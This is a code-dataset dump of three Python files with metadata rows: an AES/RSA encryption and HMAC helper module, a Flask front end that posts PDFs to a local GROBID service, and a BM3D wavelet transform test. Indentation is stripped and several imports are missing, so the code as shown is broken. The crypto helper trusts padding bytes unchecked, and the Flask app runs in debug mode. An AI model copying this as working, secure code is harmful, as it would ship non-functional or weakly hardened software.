## the HMAC hash needs to come from hashlib; the libcrypto-backed
## versions do not have a block_size member var
from hashlib import sha256 as HMAC_HASH
from hmac import HMAC as HMAC_FUNC
try:
from Crypto.Cipher import PKCS1_OAEP as RSA_PAD_SCHEME
except ImportError:
RSA_PAD_SCHEME = None
try:
from Crypto.Signature import PKCS1_v1_5 as RSA_SGN_SCHEME
except ImportError:
RSA_SGN_SCHEME = None
## needed because RSAobj::operator== fails on None
RSA_NULL_KEY_OBJ = RSA._RSAobj(None, None)
AES_KEY_BIT_SIZE = 32 * 8
AES_KEY_DIR_NAME = "./"
AES_RAW_KEY_FILE = "aes_key.dat"
AES_MSG_PAD_SIZE = 64
RSA_KEY_BIT_SIZE = 8192
RSA_KEY_FMT_NAME = "PEM"
RSA_KEY_DIR_NAME = "./"
RSA_PUB_KEY_FILE = "rsa_pub_key.pem"
RSA_PRI_KEY_FILE = "rsa_pri_key.pem"
DATA_MARKER_BYTE = "\x01"
DATA_PARTIT_BYTE = "\n"
UNICODE_ENCODING = "utf-8"
PWRD_HASH_ROUNDS = 1024 ## stretching KDF (anti-BFA)
USR_DB_SALT_SIZE = 16 ## bytes
MIN_AES_KEY_SIZE = 16 ## bytes
MIN_PASSWORD_LEN = 12 ## bytes
## hashlib.sha{1,256}
MD5LEG_HASH_FUNC = MD5.new
SHA256_HASH_FUNC = SHA256.new
GLOBAL_RAND_POOL = Random.new()
def null_encode(s): return s
def null_decode(s): return s
def safe_decode(s, decode_func = base64.b64decode):
try:
r = decode_func(s)
except:
## if <s> is not a base64-encoded string, then
## it probably contains plaintext (UTF-8) data
r = s
return r
def extract_message_and_auth_code(raw_data_blob):
if (raw_data_blob[0] != DATA_MARKER_BYTE):
return ("", "")
i = 1
j = raw_data_blob.find(DATA_MARKER_BYTE, i)
## check if a MAC is included after the payload
if (j != -1):
msg = raw_data_blob[i : j]
mac = raw_data_blob[j + 1: ]
else:
msg = raw_data_blob[i: ]
mac = ""
return (msg, mac)
def encrypt_sign_message(aes_obj, raw_msg, use_macs):
assert(type(raw_msg) == str)
assert(isinstance(aes_obj, aes_cipher))
ret_enc_msg = ""
ret_msg_mac = ""
if (use_macs):
## enc_msg_mac := (enc_msg, msg_mac)
enc_msg_mac = aes_obj.encrypt_sign_bytes(raw_msg)
ret_enc_msg = DATA_MARKER_BYTE + enc_msg_mac[0]
ret_msg_mac = DATA_MARKER_BYTE + enc_msg_mac[1]
else:
raw_enc_msg = aes_obj.encrypt_encode_bytes(raw_msg)
ret_enc_msg = DATA_MARKER_BYTE + raw_enc_msg
return (ret_enc_msg + ret_msg_mac + DATA_PARTIT_BYTE)
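## Illustrative wire layout produced above and parsed by decrypt_auth_message
## (a sketch of this module's framing, not a standard format):
## with MACs: "\x01" + <encoded ciphertext> + "\x01" + <encoded MAC> + "\n"
## without: "\x01" + <encoded ciphertext> + "\n"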
def decrypt_auth_message(aes_obj, raw_msg, use_macs):
assert(type(raw_msg) == str)
assert(isinstance(aes_obj, aes_cipher))
## enc_msg_mac := (enc_msg, msg_mac)
enc_msg_mac = extract_message_and_auth_code(raw_msg)
## missing lead marker byte
if (len(enc_msg_mac[0]) == 0):
return ""
if (use_macs):
dec_msg = aes_obj.auth_decrypt_bytes(enc_msg_mac, safe_decode)
else:
dec_msg = aes_obj.decode_decrypt_bytes(enc_msg_mac[0], safe_decode)
return dec_msg
def verify_message_auth_code(our_mac, msg_mac, ses_key):
## two rounds closes a timing side-channel
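## (hashing both values again means the comparison below always runs over
## fixed-length digests, so timing cannot leak the real MAC's length or bytes)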
msg_mac = HMAC_FUNC(ses_key, msg_mac, HMAC_HASH)
our_mac = HMAC_FUNC(ses_key, our_mac, HMAC_HASH)
msg_mac = msg_mac.digest()
our_mac = our_mac.digest()
num_val = 0
if (len(msg_mac) != len(our_mac)):
return False
## fixed linear-time comparison closes another
for i in xrange(len(our_mac)):
num_val += (our_mac[i] == msg_mac[i])
return (num_val == len(our_mac))
def int32_to_str(n):
assert(n >= (0 ))
assert(n < (1 << 32))
s = ""
s += "%c" % ((n >> 0) & 0xff)
s += "%c" % ((n >> 8) & 0xff)
s += "%c" % ((n >> 16) & 0xff)
s += "%c" % ((n >> 24) & 0xff)
return s
def str_to_int32(s):
n = 0
n += (ord(s[0]) << 0)
n += (ord(s[1]) << 8)
n += (ord(s[2]) << 16)
n += (ord(s[3]) << 24)
return n
def pad_str(msg, bs):
num = bs - (len(msg) % bs)
ext = num * chr(num)
return (msg + ext)
def unpad_str(msg, bs):
idx = len(msg) - 1
cnt = ord(msg[idx: ])
return msg[0: -cnt]
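## e.g. pad_str("abc", 16) appends 13 bytes of chr(13) (PKCS#7-style), and
## unpad_str strips them off again; note that unpad_str trusts the final byte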
def read_file(file_name, file_mode):
try:
f = open(file_name, file_mode)
s = f.read()
f = f.close()
return s
except IOError:
pass
return ""
def write_file(file_name, file_mode, file_data):
try:
f = open(file_name, file_mode)
os.fchmod(f.fileno(), 0600)
f.write("%s" % file_data)
f = f.close()
except IOError:
pass
class rsa_cipher:
def __init__(self, key_dir = RSA_KEY_DIR_NAME):
self.set_rnd_gen(Random.new())
self.set_instance_keys(key_dir)
self.set_pad_scheme(RSA_PAD_SCHEME)
self.set_sgn_scheme(RSA_SGN_SCHEME)
def set_rnd_gen(self, rnd_gen): self.rnd_gen = rnd_gen
def set_pub_key(self, pub_key): self.pub_key = pub_key
def set_pri_key(self, pri_key): self.pri_key = pri_key
def get_pub_key(self): return self.pub_key
def get_pri_key(self): return self.pri_key
def sanity_test_keys(self):
pk = (self.pri_key.publickey())
b0 = (pk == self.pub_key)
b1 = (pk.exportKey(RSA_KEY_FMT_NAME) == self.pub_key.exportKey(RSA_KEY_FMT_NAME))
b2 = ((not self.pub_key.has_private()) and self.pri_key.has_private())
return (b0 and b1 and b2)
def set_pad_scheme(self, scheme):
if (scheme == None):
self.enc_pad_scheme = None
self.dec_pad_scheme = None
else:
self.enc_pad_scheme = scheme.new(self.pub_key)
self.dec_pad_scheme = scheme.new(self.pri_key)
def set_sgn_scheme(self, scheme):
if (scheme == None):
self.msg_sign_scheme = None
self.msg_auth_scheme = None
else:
self.msg_sign_scheme = scheme.new(self.pri_key)
self.msg_auth_scheme = scheme.new(self.pub_key)
def set_instance_keys(self, key_dir):
if (key_dir == None):
self.set_pub_key(RSA_NULL_KEY_OBJ)
self.set_pri_key(RSA_NULL_KEY_OBJ)
return
if (not self.import_keys(key_dir)):
self.generate_keys()
assert(self.sanity_test_keys())
def generate_keys(self, num_bits = RSA_KEY_BIT_SIZE):
self.set_pri_key(RSA.generate(num_bits, self.rnd_gen.read))
self.set_pub_key(self.pri_key.publickey())
return True
def import_key(self, key_str):
return (RSA.importKey(key_str))
def import_keys(self, key_dir):
assert(len(key_dir) == 0 or key_dir[-1] == '/')
pub_key_str = read_file(key_dir + RSA_PUB_KEY_FILE, "r")
pri_key_str = read_file(key_dir + RSA_PRI_KEY_FILE, "r")
if (len(pub_key_str) != 0 and len(pri_key_str) != 0):
self.set_pub_key(self.import_key(pub_key_str))
self.set_pri_key(self.import_key(pri_key_str))
return True
return False
def export_keys(self, key_dir):
assert(len(key_dir) != 0)
assert(key_dir[-1] == '/')
if (not os.path.isdir(key_dir)):
os.mkdir(key_dir, 0700)
write_file(key_dir + RSA_PUB_KEY_FILE, "w", self.pub_key.exportKey(RSA_KEY_FMT_NAME))
write_file(key_dir + RSA_PRI_KEY_FILE, "w", self.pri_key.exportKey(RSA_KEY_FMT_NAME))
## these make sure that any native unicode inputs are converted
## to standard (UTF-8 encoded byte sequences) strings, otherwise
## crypto operations might be undefined
def encrypt_encode_bytes_utf8(self, raw_bytes, encode_func = base64.b64encode):
return (self.encrypt_encode_bytes(raw_bytes.encode(UNICODE_ENCODING), encode_func))
def decode_decrypt_bytes_utf8(self, enc_bytes, decode_func = base64.b64decode):
return (self.decode_decrypt_bytes(enc_bytes.encode(UNICODE_ENCODING), decode_func))
def encrypt_encode_bytes(self, raw_bytes, encode_func = base64.b64encode):
assert(type(raw_bytes) == str)
assert(len(raw_bytes) != 0)
assert(self.pub_key.size() >= (len(raw_bytes) * 8))
assert(ord(raw_bytes[0]) != 0)
if (self.enc_pad_scheme != None):
enc_bytes = self.enc_pad_scheme.encrypt(raw_bytes)
else:
## NOTE: RSAobj.encrypt() returns a tuple (!)
enc_bytes = self.pub_key.encrypt(raw_bytes, "")[0]
return (encode_func(enc_bytes))
def decode_decrypt_bytes(self, enc_bytes, decode_func = base64.b64decode):
assert(type(enc_bytes) == str)
assert(len(enc_bytes) != 0)
## assert((self.pri_key.size() + 1) == (len(decode_func(enc_bytes)) * 8))
enc_bytes = decode_func(enc_bytes)
if (self.dec_pad_scheme != None):
dec_bytes = self.dec_pad_scheme.decrypt(enc_bytes)
else:
dec_bytes = self.pri_key.decrypt(enc_bytes)
return dec_bytes
def sign_bytes_utf8(self, msg_bytes):
return (self.sign_bytes(msg_bytes.encode(UNICODE_ENCODING)))
def auth_bytes_utf8(self, msg_bytes, sig_bytes):
return (self.auth_bytes(msg_bytes.encode(UNICODE_ENCODING), sig_bytes))
def sign_bytes(self, msg_bytes):
assert(type(msg_bytes) == str)
assert(len(msg_bytes) != 0)
msg_bytes = SHA256_HASH_FUNC(msg_bytes)
if (self.msg_sign_scheme != None):
## scheme.sign() expects an object from Crypto.Hash
ret = self.msg_sign_scheme.sign(msg_bytes)
else:
## RSAobj.sign() returns a tuple
ret = str(self.pri_key.sign(msg_bytes.digest(), "")[0])
assert(type(ret) == str)
return ret
def auth_bytes(self, msg_bytes, sig_bytes):
assert(type(msg_bytes) == str)
assert(type(sig_bytes) == str)
assert(len(msg_bytes) != 0)
msg_bytes = SHA256_HASH_FUNC(msg_bytes)
if (self.msg_auth_scheme != None):
## scheme.verify() expects an object from Crypto.Hash
ret = self.msg_auth_scheme.verify(msg_bytes, sig_bytes)
else:
## RSAobj.verify() expects a tuple
ret = (self.pub_key.verify(msg_bytes.digest(), (long(sig_bytes), 0L)))
assert(type(ret) == bool)
return ret
class aes_cipher:
def __init__(self, key_dir = AES_KEY_DIR_NAME, padding_length = AES_MSG_PAD_SIZE):
assert(type(key_dir) == str)
assert((padding_length % 16) == 0)
self.pad_length = padding_length
self.random_gen = Random.new()
self.khash_func = SHA256_HASH_FUNC
self.set_instance_key(key_dir)
def set_instance_key(self, key_dir):
if (not self.import_key(key_dir)):
self.set_key(self.generate_key(""))
def generate_key(self, raw_key, key_len = AES_KEY_BIT_SIZE):
if (len(raw_key) == 0):
key_str = self.random_gen.read(key_len / 8)
key_str = self.khash_func(key_str)
else:
key_str = self.khash_func(raw_key)
return (key_str.digest())
def get_key(self): return self.key_string
def set_key(self, s): self.key_string = s
def import_key(self, key_dir):
assert(len(key_dir) == 0 or key_dir[-1] == '/')
key_str = read_file(key_dir + AES_RAW_KEY_FILE, "rb")
if (len(key_str) != 0):
self.set_key(key_str)
return True
return False
def export_key(self, key_dir):
assert(len(key_dir) != 0)
assert(key_dir[-1] == '/')
if (not os.path.isdir(key_dir)):
os.mkdir(key_dir, 0700)
write_file(key_dir + AES_RAW_KEY_FILE, "wb", self.get_key())
def encrypt_encode_bytes_utf8(self, raw_bytes, encode_func = base64.b64encode):
return (self.encrypt_encode_bytes(raw_bytes.encode(UNICODE_ENCODING), encode_func))
def decode_decrypt_bytes_utf8(self, enc_bytes, decode_func = base64.b64decode):
return (self.decode_decrypt_bytes(enc_bytes.encode(UNICODE_ENCODING), decode_func))
def encrypt_encode_bytes(self, raw_bytes, encode_func = base64.b64encode):
assert(type(raw_bytes) == str)
assert(len(raw_bytes) != 0)
ini_vector = self.random_gen.read(AES.block_size)
aes_object = AES.new(self.key_string, AES.MODE_CBC, ini_vector)
pad_bytes = pad_str(raw_bytes, self.pad_length)
enc_bytes = aes_object.encrypt(pad_bytes)
return (encode_func(ini_vector + enc_bytes))
def decode_decrypt_bytes(self, enc_bytes, decode_func = base64.b64decode):
assert(type(enc_bytes) == str)
assert(len(enc_bytes) != 0)
enc_bytes = decode_func(enc_bytes)
ini_vector = enc_bytes[0: AES.block_size]
aes_object = AES.new(self.key_string, AES.MODE_CBC, ini_vector)
dec_bytes = aes_object.decrypt(enc_bytes[AES.block_size: ])
dec_bytes = unpad_str(dec_bytes, self.pad_length)
return dec_bytes
def encrypt_sign_bytes_utf8(self, raw_msg, encode_func = base64.b64encode):
return (self.encrypt_sign_bytes(raw_msg.encode(UNICODE_ENCODING), encode_func))
def auth_decrypt_bytes_utf8(self, (enc_msg, msg_mac), decode_func = base64.b64decode):
return (self.auth_decrypt_bytes((enc_msg.encode(UNICODE_ENCODING), msg_mac.encode(UNICODE_ENCODING)), decode_func))
def encrypt_sign_bytes(self, raw_msg, encode_func = base64.b64encode):
assert(type(raw_msg) == str)
## encrypt, then sign (HMAC = H((K ^ O) | H((K ^ I) | M)))
enc_msg = self.encrypt_encode_bytes(raw_msg, null_encode)
msg_mac = HMAC_FUNC(self.get_key(), enc_msg, HMAC_HASH)
msg_mac = encode_func(msg_mac.digest())
enc_msg = encode_func(enc_msg)
return (enc_msg, msg_mac)
def auth_decrypt_bytes(self, (enc_msg, msg_mac), decode_func = base64.b64decode):
assert(type(enc_msg) == str)
assert(type(msg_mac) == str)
## auth, then decrypt
msg_mac = decode_func(msg_mac)
enc_msg = decode_func(enc_msg)
our_mac = HMAC_FUNC(self.get_key(), enc_msg, HMAC_HASH)
our_mac = our_mac.digest()
if (verify_message_auth_code(our_mac, msg_mac, self.get_key())):
return (self.decode_decrypt_bytes(enc_msg, null_decode))
## counts as false
return ""
| CryptoHandler.py | 12,848 | needs to be imported from hashlib, libcrypto versions do not have a block_size member var needed because RSAobj::operator== fails on None stretching KDF (anti-BFA) bytes bytes bytes hashlib.sha{1,256} if <s> is not a base64-encoded string, then it probably contains plaintext (UTF-8) data check if a MAC is included after the payload enc_msg_mac := (enc_msg, msg_mac) enc_msg_mac := (enc_msg, msg_mac) missing lead marker byte two rounds closes a timing side-channel fixed linear-time comparison closes another these make sure that any native unicode inputs are converted to standard (UTF-8 encoded byte sequences) strings, otherwise crypto operations might be undefined NOTE: RSAobj.encrypt() returns a tuple (!) assert((self.pri_key.size() + 1) == (len(decode_func(enc_bytes)) * 8)) scheme.sign() expects an object from Crypto.Hash RSAobj.sign() returns a tuple scheme.verify() expects an object from Crypto.Hash RSAobj.verify() expects a tuple encrypt, then sign (HMAC = H((K ^ O) | H((K ^ I) | M))) auth, then decrypt counts as false | 1,037 | en | 0.635182 |
from flask import Flask
from flask import request, session, render_template, json, Response, jsonify, make_response, send_file, redirect, url_for
import requests
import xml.etree.ElementTree as ET
import lxml
import pandas as pd
import re
app = Flask(__name__)
@app.route('/')
def index():
return render_template('process_fulltext.html')
@app.route('/process_fulltext', methods = ['GET', 'POST'])
def process_fulltext():
    upload = request.files.get('file', '').read()  # read the uploaded file from the request
url = 'http://localhost:8070/api/processFulltextDocument'
files = dict(input=upload, teiCoordinates="biblStruct")
r = requests.post(url, files=files)
return render_template('process_fulltext.html', r=r.text)
# takes a string, removes any XML elements inside it, and trims surrounding whitespace
def clean(text):
text = re.sub("<[^>]+>","", text)
text = re.sub("^\s+|\s+$","", text)
return text
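# e.g. clean(' <title level="a">Foo Bar</title> ') returns 'Foo Bar'
# (tags are stripped first, then leading/trailing whitespace)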
# parses the TEI document and builds a list of reference dictionaries from its TEI elements
def parse_tei(xml):
#data = open(xml)
data = xml.split('\n')
refs = []
ref = []
start = False
title = ""
name = ""
date = ""
names = []
year = ""
#art_name = re.sub(".*\/","")
old_ref = {"title": "", "name": "", "date": "", "year_pub": ""}
for line in data:
if re.match(".*<date",line) and start == False:
year = re.sub(".*when\=\"","",line)
year = re.sub("\".*","",year)[0:4]
if start == False and re.match(".*<back",line):
start = True
if start == False:
continue
if re.match(".*<biblStruct",line):
if title == "":
continue
ref = {"title": title, "name": names, "date": date, "year_pub": year}
if ref["title"] == old_ref["title"]:
continue
else:
refs.append(ref)
                old_ref = ref
names = []
if re.match(".*<title.*type=\"main\"",line):
title = clean(line)
if re.match(".*<persName",line):
forename = re.sub("<\/forename.*","",line)
forename = clean(forename)
surname = re.sub(".*<surname","",line)
surname = clean(surname)
surname = re.sub(">",". ",surname)
name = forename+surname
names.append(name)
if re.match(".*<date",line):
date = re.sub(".*when\=\"","",line)
date = re.sub("\".*","",date)
date = date[0:4]
return refs
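# each entry returned by parse_tei is a dict shaped roughly like
# {"title": <cited title>, "name": [<author strings>], "date": <year of the cited work>, "year_pub": <year of the citing article>}
# (shown for illustration; exact values depend on the TEI produced by GROBID)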
# sends a request to the GROBID API to process the PDF and returns the parsed data to the template view as a dataframe
@app.route('/process_references', methods = ['GET', 'POST'])
def process_references():
    upload = request.files.get('file', '').read()  # read the uploaded file from the request
url = 'http://localhost:8070/api/processFulltextDocument'
files = dict(input=upload, teiCoordinates="biblStruct")
r = requests.post(url, files=files)
tei_list = parse_tei(r.text)
# increase the column width of pd (standard is only 50px)
pd.set_option('display.max_colwidth', -1)
df1 = pd.DataFrame(tei_list)
# removing year_pub column
df1 = df1.drop('year_pub', axis=1)
df2 = df1.to_json()
df1 = df1.to_html()
# changing css class in html for dataframe output
df1 = re.sub("dataframe", "myTable", df1)
return render_template('process_fulltext.html', df1=df1, df2=df2)
if __name__ == '__main__':
app.run(debug=True) | TrackA_python/codesprintapp/views.py | 3,132 | puts the uploaded file (in the request) takes a string and removes xml element insideparses the tei document and creates list of dictionaries out of tei elementsdata = open(xml)art_name = re.sub(".*\/","") sends request to grobid api to process the pdf and returns data in dataframe to template viewputs the uploaded file (in the request) increase the column width of pd (standard is only 50px) removing year_pub column changing css class in html for dataframe output | 467 | en | 0.789557 |
import math
import numpy as np
import pywt  # bior_2d_forward uses pywt.dwt2
from cpp2py_test.bior_2d_forward_test1 import original_bior_2d_forward, bior15_coef
def bior_2d_forward(img):
    # multi-level 2D bior1.5 forward transform, computed in place:
    # each level decomposes the current top-left N x N block with pywt and
    # packs the four sub-bands back into the quadrants of that block
    assert img.shape[0] == img.shape[1]
    N = img.shape[0]
    iter_max = int(math.log2(N))
    for iter in range(iter_max):
        coeffs2 = pywt.dwt2(img[:N, :N], 'bior1.5', mode='periodic')
        LL, (LH, HL, HH) = coeffs2
        # [2:-2] crops the extra border coefficients produced by the
        # 'periodic' mode so each sub-band fits an (N/2 x N/2) quadrant;
        # HL/LH are negated so the output matches original_bior_2d_forward
        img[:N//2, :N//2] = LL[2: -2, 2: -2]
        img[N//2:N, N//2:N] = HH[2: -2, 2: -2]
        img[:N//2, N//2:N] = -HL[2: -2, 2: -2]
        img[N//2:N, :N//2] = -LH[2: -2, 2: -2]
        N //= 2
    return img
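# quick sanity sketch (added for illustration, not part of the original test):
# for a constant image all detail coefficients should come out (near) zero,
# so only the top-left (DC) entry of the result should be significant;
# exact values depend on pywt's 'bior1.5' filters
def _constant_image_check(n=8, value=10.0):
    out = bior_2d_forward(np.full((n, n), value))  # n must be a power of two
    flat = out.ravel()
    return flat[0], np.abs(flat[1:]).max()  # (DC term, max detail magnitude ~ 0)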
if __name__ == '__main__':
import cv2
import pywt
import matplotlib.pyplot as plt
img = cv2.imread('Cameraman256.png', cv2.IMREAD_GRAYSCALE)
img = img.astype(np.float64)
# img = img[0:8, 0:8]
# original way
original_bior_img = original_bior_2d_forward(img)
# my way
bior_img = bior_2d_forward(img.copy())
# a, b = 0, 8
# c, d = 0, 8
# print('original_bior_img\n', original_bior_img[a:b, c:d].astype(np.int))
# print('bior_img\n', bior_img[a:b, c:d].astype(np.int))
# print('max original_bior_img', np.max(original_bior_img))
# print('min original_bior_img', np.min(original_bior_img))
#
# print('max bior_img', np.max(bior_img))
# print('min bior_img', np.min(bior_img))
diff = original_bior_img - bior_img
print('sum of diff', np.sum(np.abs(diff)))
print('max of diff', np.max(np.abs(diff)))
cv2.imshow('original_bior_img', original_bior_img)
cv2.imshow('bior_img', bior_img)
cv2.imshow('diff', diff)
cv2.waitKey()
| BM3D_py/cpp2py_test/bior_2d_forward_test2.py | 1,620 | img = img[0:8, 0:8] original way my way a, b = 0, 8 c, d = 0, 8 print('original_bior_img\n', original_bior_img[a:b, c:d].astype(np.int)) print('bior_img\n', bior_img[a:b, c:d].astype(np.int)) print('max original_bior_img', np.max(original_bior_img)) print('min original_bior_img', np.min(original_bior_img)) print('max bior_img', np.max(bior_img)) print('min bior_img', np.min(bior_img)) | 387 | es | 0.398449 |